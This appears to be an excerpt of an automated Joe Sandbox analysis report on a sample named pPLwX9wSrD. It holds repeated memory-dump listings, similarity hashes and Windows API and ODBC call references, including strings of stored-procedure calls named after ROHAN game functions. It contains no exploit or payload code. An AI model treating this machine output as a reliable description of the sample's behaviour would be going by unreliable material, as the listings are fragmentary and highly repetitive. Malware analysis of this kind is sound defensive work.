                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$Current$Create
                                                                                      • String ID:
                                                                                      • API String ID: 2517807233-0
                                                                                      • Opcode ID: 72b1d841c66615d38ae1e4bd47e0fe449c83858933522afca039f2ebd571c5b3
                                                                                      • Instruction ID: b6cbd08ee30c82743624672a55c75a81726dba72c14fbdcf07f4297eaa681248
                                                                                      • Opcode Fuzzy Hash: 72b1d841c66615d38ae1e4bd47e0fe449c83858933522afca039f2ebd571c5b3
                                                                                      • Instruction Fuzzy Hash: 3321E770A04288AFDB14CF60D894BF9BBB4AF49704F0441DDEA199B351DA74EB80CF45
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000), ref: 0044A4EF
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000), ref: 0044A51F
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044A54F
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044A57F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bd3bf611e14fc00a6f8f3a4313c402274ec1183087522d49ef02443548318374
                                                                                      • Instruction ID: 9c230a460e304789250fbd902db337b75caeff7b930e9f27b0a61d9ededdf4ce
                                                                                      • Opcode Fuzzy Hash: bd3bf611e14fc00a6f8f3a4313c402274ec1183087522d49ef02443548318374
                                                                                      • Instruction Fuzzy Hash: 272175B0A00119BBDB24EF88ED55FAA73B5EF48714F1082C8F6186B3C1D231AD508F58
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000), ref: 0044C6CA
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000), ref: 0044C6FA
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044C72A
                                                                                      • #4.ODBC32(?,00000000,00000001,?,000000C9,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044C75D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b01bd08b16833d0e38c81c1c3d5a9735bbdf0c8e9d0dfbb3b454ff505294ebd4
                                                                                      • Instruction ID: f61e3fb9075f1164bcb39f9268d7f779dd3f179c3e87c06845e4c04dab24d03b
                                                                                      • Opcode Fuzzy Hash: b01bd08b16833d0e38c81c1c3d5a9735bbdf0c8e9d0dfbb3b454ff505294ebd4
                                                                                      • Instruction Fuzzy Hash: EE215EB0A00118ABDB24DF09CC99FAAB379FF40714F1082CAF6187B391D271AD808F54
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000), ref: 0044C5E7
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000), ref: 0044C617
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044C647
                                                                                      • #4.ODBC32(?,00000000,00000001,?,000000C9,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044C67A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7ee4bcc04e45d0d201e364b6f5088e6599c49bb5500c1a341ea51a2246d42caa
                                                                                      • Instruction ID: ea012b0e4620368f1df73059d13864150261419d1cc8207e767d58724612ae0e
                                                                                      • Opcode Fuzzy Hash: 7ee4bcc04e45d0d201e364b6f5088e6599c49bb5500c1a341ea51a2246d42caa
                                                                                      • Instruction Fuzzy Hash: 4E214DB4A02118ABFB64DF09CC59FAE7335EB44718F20C2C9F6196B391DA71AD808F54
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(?,?,0041178C,?,?,?,?), ref: 00461414
                                                                                      • SetTextColor.GDI32(?,?), ref: 00461436
                                                                                      • TextOutA.GDI32(?,00000001,?,?,?), ref: 00461480
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,0041178C,?), ref: 0046148D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionText$ColorEnterLeave
                                                                                      • String ID:
                                                                                      • API String ID: 2849919995-0
                                                                                      • Opcode ID: ff5513042247184df39979646622bde19cd9b813bc8aa9d423c0933b83a0adbd
                                                                                      • Instruction ID: 10c3e8ab75c5dcc878972731bacdd0f92cb79f174a69f1e64db862e4b1de0180
                                                                                      • Opcode Fuzzy Hash: ff5513042247184df39979646622bde19cd9b813bc8aa9d423c0933b83a0adbd
                                                                                      • Instruction Fuzzy Hash: C321E778A00209EFCB44CF98D894E9EBBB5FF49318F148199E905A7312C734EA50CFA4
                                                                                      APIs
                                                                                      • GetTopWindow.USER32(?), ref: 0049FB36
                                                                                      • GetTopWindow.USER32(00000000), ref: 0049FB75
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 0049FB93
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window
                                                                                      • String ID:
                                                                                      • API String ID: 2353593579-0
                                                                                      • Opcode ID: 0f23bf28f7737d98a015068301c35e16f86ac192de3a0eb6c7064936200a9eaa
                                                                                      • Instruction ID: ca4fdd15a02c36f2cea4d6ed80c1cde507a138e9fb9505a9251aca9618b90fe9
                                                                                      • Opcode Fuzzy Hash: 0f23bf28f7737d98a015068301c35e16f86ac192de3a0eb6c7064936200a9eaa
                                                                                      • Instruction Fuzzy Hash: 8A01D73240121ABBDF126F91DC15EDF3E6AEF05364F044036FA0591121C73AE976EBA9
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_SetRevengeRank]},000000FD), ref: 0043E417
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043E456
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_SetRevengeRank]}, xrefs: 0043E40E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_SetRevengeRank]}
                                                                                      • API String ID: 0-3442329064
                                                                                      • Opcode ID: c5589abd2dbfa94837620d1bf892307cd70d982fb89eca9164957f4ebe71c2ff
                                                                                      • Instruction ID: 27fba5df791befbb2cc680f14568ea0525a455b420db8c71609fcc316ab4d79a
                                                                                      • Opcode Fuzzy Hash: c5589abd2dbfa94837620d1bf892307cd70d982fb89eca9164957f4ebe71c2ff
                                                                                      • Instruction Fuzzy Hash: 18F030B5E44218ABEF29CF44CC82FEA7374EB58715F108289F7186B2C0D6F56D908B48
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DelIndunRestrictInfo2]},000000FD), ref: 00440625
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00440664
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DelIndunRestrictInfo2]}, xrefs: 0044061C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
